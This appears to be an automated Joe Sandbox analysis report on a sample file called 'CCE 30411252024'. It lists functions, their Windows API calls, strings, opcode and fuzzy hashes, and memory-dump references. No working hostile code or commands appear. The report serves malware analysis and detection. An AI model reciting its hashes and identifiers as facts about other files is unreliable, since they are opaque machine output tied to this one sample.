                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 5deff18d2da83194ea63d627443b78f67d6c54d346ea4ae7b822c28ff745485f
                                                                                        • Instruction ID: 9ba2ec84e38ecda45abfbb661f15a65c63d59d99678ccea278c2019e11349331
                                                                                        • Opcode Fuzzy Hash: 5deff18d2da83194ea63d627443b78f67d6c54d346ea4ae7b822c28ff745485f
                                                                                        • Instruction Fuzzy Hash: 6161CC70902608DFDB359F18D988B35B7F5FF85366F15111EE642A6AB0C770A880EB80
                                                                                        Function 00EFB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB526: GetWindowLongW.USER32(?,000000EB), ref: 00EFB537
                                                                                        • GetSysColor.USER32(0000000F), ref: 00EFB438
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 29a11d9e6775657077b20d9c729c3a9cc6e2645e48a09e9d9b1ddc781323cf2c
                                                                                        • Instruction ID: 2fd6e4913506a1813323cc3ec49604743e881ce975cb186189f9323da32c1ba8
                                                                                        • Opcode Fuzzy Hash: 29a11d9e6775657077b20d9c729c3a9cc6e2645e48a09e9d9b1ddc781323cf2c
                                                                                        • Instruction Fuzzy Hash: D341CF30501108AFDB206F28DD89BB93B66BB46735F184261FE759E1E6E7B08D41EB21
                                                                                        Function 00F2690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 136442275-0
                                                                                        • Opcode ID: 53fcb4fc8f2c4d36ee381c19e86a6a0bee59ceae619866ccfff8ea702e96c62c
                                                                                        • Instruction ID: 9c93759ada794c0fc63b44406ccd91b3011d98d71c7ebd6121317d319d3eeda1
                                                                                        • Opcode Fuzzy Hash: 53fcb4fc8f2c4d36ee381c19e86a6a0bee59ceae619866ccfff8ea702e96c62c
                                                                                        • Instruction Fuzzy Hash: D841417684612CAEDF65DB90DC45DDF73BCEB44310F0041A6B649E2081EE38ABE4AF51
                                                                                        Function 00F2D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(00F7DC00,00F7DC00,00F7DC00), ref: 00F2D7CE
                                                                                        • GetDriveTypeW.KERNEL32(?,00F93A70,00000061), ref: 00F2D898
                                                                                        • _wcscpy.LIBCMT ref: 00F2D8C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: 954e47873227dcd9d488efeb30cfa1f4d8e68e5fa59cc85da49c1b5c1303a3a5
                                                                                        • Instruction ID: f2351b14ce46a9e840c2ebb326e5deebbcbdef7238943c41c8f48caeedd97a88
                                                                                        • Opcode Fuzzy Hash: 954e47873227dcd9d488efeb30cfa1f4d8e68e5fa59cc85da49c1b5c1303a3a5
                                                                                        • Instruction Fuzzy Hash: 4C51C335504358AFD700EF14E881AAEB7E5EF84314F20982DF59A672A2DB31ED05EB42
                                                                                        Function 00EE936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00EE93AB
                                                                                        • __itow.LIBCMT ref: 00EE93DF
                                                                                          • Part of subcall function 00F01557: _xtow@16.LIBCMT ref: 00F01578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 1502193981-2263619337
                                                                                        • Opcode ID: 94955704afa2b6995712c0725c27f2b71f7d5590e088592121f850fcf4ffbefa
                                                                                        • Instruction ID: 32d3e3b5aac2d4458024bdbba780f8382659078be49371be93efca4cf9a62083
                                                                                        • Opcode Fuzzy Hash: 94955704afa2b6995712c0725c27f2b71f7d5590e088592121f850fcf4ffbefa
                                                                                        • Instruction Fuzzy Hash: EB410872900208ABDB24DB75DD45EBA73E4EF84314F20446EE649E71C2EA31E941EB11
                                                                                        Function 00F4A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F4A259
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F4A260
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F4A273
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F4A27B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F4A286
                                                                                        • DeleteDC.GDI32(00000000), ref: 00F4A28F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F4A299
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F4A2AD
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F4A2B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: 461aa671d8f71d597b86f5496ea4c7d43a33462c061400627108c47dc2fe8c03
                                                                                        • Instruction ID: 51c0b6f1aba21ec10ee7da643577fd8b751f87e691ad2451bf702d8107b69b40
                                                                                        • Opcode Fuzzy Hash: 461aa671d8f71d597b86f5496ea4c7d43a33462c061400627108c47dc2fe8c03
                                                                                        • Instruction Fuzzy Hash: 36318F31A41119ABDF115FA4DC49FEA3F69FF0E360F100214FA29A60A0C7B6D811FB65
                                                                                        Function 00F26F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 2620052-3771769585
                                                                                        • Opcode ID: 5b272fed64a51f70978c753f45d09461da88421de89a78b034f8431abc5831de
                                                                                        • Instruction ID: b435b95e5ed108943492d04fff5e260eff1b42d371573177c0d920c8ba6d4386
                                                                                        • Opcode Fuzzy Hash: 5b272fed64a51f70978c753f45d09461da88421de89a78b034f8431abc5831de
                                                                                        • Instruction Fuzzy Hash: AF11E772A04129ABDF14AB70BD49EDA77BCDF40720F040065F515E6091FFB4DE81B661
                                                                                        Function 00F0500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F05047
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • __gmtime64_s.LIBCMT ref: 00F050E0
                                                                                        • __gmtime64_s.LIBCMT ref: 00F05116
                                                                                        • __gmtime64_s.LIBCMT ref: 00F05133
                                                                                        • __allrem.LIBCMT ref: 00F05189
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F051A5
                                                                                        • __allrem.LIBCMT ref: 00F051BC
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F051DA
                                                                                        • __allrem.LIBCMT ref: 00F051F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F0520F
                                                                                        • __invoke_watson.LIBCMT ref: 00F05280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction ID: 1f2f82166211417f64f2dbc04d77f4a1dfc07c4c77628a49c63be251843e4786
                                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction Fuzzy Hash: 7B719572E01B17ABE714AE68CC41B9BB3A9BF04B64F144229F514D66C1E7B4D940BFD0
                                                                                        Function 00F24DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F24DF8
                                                                                        • GetMenuItemInfoW.USER32(00FA1708,000000FF,00000000,00000030), ref: 00F24E59
                                                                                        • SetMenuItemInfoW.USER32(00FA1708,00000004,00000000,00000030), ref: 00F24E8F
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00F24EA1
                                                                                        • GetMenuItemCount.USER32(?), ref: 00F24EE5
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F24F01
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00F24F2B
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F24F70
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F24FB6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F24FCA
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F24FEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: dbc1c6420b91545b7cff7b7e85b38dbd46f57313c238978e5b89db5dd51f0016
                                                                                        • Instruction ID: 5d1abe37b5815a8b8d5e16befbcf2fac0b30a59bdc16afa3c1162ee95b6d4b7b
                                                                                        • Opcode Fuzzy Hash: dbc1c6420b91545b7cff7b7e85b38dbd46f57313c238978e5b89db5dd51f0016
                                                                                        • Instruction Fuzzy Hash: E561B171A00269AFDB21CFA4ED84AAE7BB8FB85314F154059F412A7291D7B0BD04EB21
                                                                                        Function 00F49C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F49C98
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F49C9B
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F49CBF
                                                                                        • _memset.LIBCMT ref: 00F49CD0
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F49CE2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F49D5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: 262950e450640f92b0b176b2e37dbdf773e3579dd676a53fc03a6225638a74da
                                                                                        • Instruction ID: 160824ce8b2a3b5c4e4cc9315270432630f1afb5fc9286c08cfdd648d82c3371
                                                                                        • Opcode Fuzzy Hash: 262950e450640f92b0b176b2e37dbdf773e3579dd676a53fc03a6225638a74da
                                                                                        • Instruction Fuzzy Hash: 04616CB5A00208AFDB21DFA4CC81EEE7BB8EB09714F144159FE15E7291D7B4AD41EB60
                                                                                        Function 00F194E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00F194FE
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00F19549
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1955B
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F1957B
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00F195BE
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F195D2
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F195E7
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00F195F4
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F195FD
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1960F
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F1961A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 14fbf2516b4e064505d4dfdafbd13c85672e41ff806b6054b5cfa594eb4a3aa8
                                                                                        • Instruction ID: 0d34dfdb4b30748bf1dacda2161237c4f9af984116373071449ce5510755af35
                                                                                        • Opcode Fuzzy Hash: 14fbf2516b4e064505d4dfdafbd13c85672e41ff806b6054b5cfa594eb4a3aa8
                                                                                        • Instruction Fuzzy Hash: E6414131E0021DAFCB01DFA4DC549EEBBB9FF48354F108069E511A3251DBB5EA85DBA1
                                                                                        Function 00F3ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CoInitialize.OLE32 ref: 00F3ADF6
                                                                                        • CoUninitialize.OLE32 ref: 00F3AE01
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00F6D8FC,?), ref: 00F3AE61
                                                                                        • IIDFromString.OLE32(?,?), ref: 00F3AED4
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3AF6E
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F3AFCF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: 5ccbc6f62e45f2341e6c195c0162da141cc6f351321c463fc6e0b5d840f9c83d
                                                                                        • Instruction ID: 737d292a6ec14bfa14039e57ea28c26bbda212f59fbf53d3051bd84c2d9c6bd9
                                                                                        • Opcode Fuzzy Hash: 5ccbc6f62e45f2341e6c195c0162da141cc6f351321c463fc6e0b5d840f9c83d
                                                                                        • Instruction Fuzzy Hash: F161BD71608311DFD710DF66D848B6EB7E8AF48724F004409F9859B2A2C774ED88EB93
                                                                                        Function 00F38107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00F38168
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00F381AD
                                                                                        • gethostbyname.WSOCK32(?), ref: 00F381B9
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00F381C7
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F38237
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F3824D
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F382C2
                                                                                        • WSACleanup.WSOCK32 ref: 00F382C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: cf7658071ab41a120d18dce4cce022616e2fe98e21034bdcd4e2c153637df6eb
                                                                                        • Instruction ID: 66849e1f504582d3fd6a7a049f8841aa6be52f33652ae6cedc007dcfd8e178a9
                                                                                        • Opcode Fuzzy Hash: cf7658071ab41a120d18dce4cce022616e2fe98e21034bdcd4e2c153637df6eb
                                                                                        • Instruction Fuzzy Hash: 8851A331A047049FDB20AF64CC45B2BB7E4EF48370F044859FA65E72A1DB74E902EB51
                                                                                        Function 00F49E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F49E5B
                                                                                        • CreateMenu.USER32 ref: 00F49E76
                                                                                        • SetMenu.USER32(?,00000000), ref: 00F49E85
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F49F12
                                                                                        • IsMenu.USER32(?), ref: 00F49F28
                                                                                        • CreatePopupMenu.USER32 ref: 00F49F32
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F49F63
                                                                                        • DrawMenuBar.USER32 ref: 00F49F71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 176399719-4108050209
                                                                                        • Opcode ID: 7a4a91e133196b8ad4b77bb81b6dbeea6827a3b2be3d2bf3cbe1eec6bbf5eeaf
                                                                                        • Instruction ID: 5cd96eac459f4809c0387527083e22705df6a73da2ab9a9566e8ea9e3bf12ba4
                                                                                        • Opcode Fuzzy Hash: 7a4a91e133196b8ad4b77bb81b6dbeea6827a3b2be3d2bf3cbe1eec6bbf5eeaf
                                                                                        • Instruction Fuzzy Hash: 274158B8B00209AFDB10DF64D844BAABBB5FF49324F144018ED56A7361D7B0A914EB50
                                                                                        Function 00F2E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
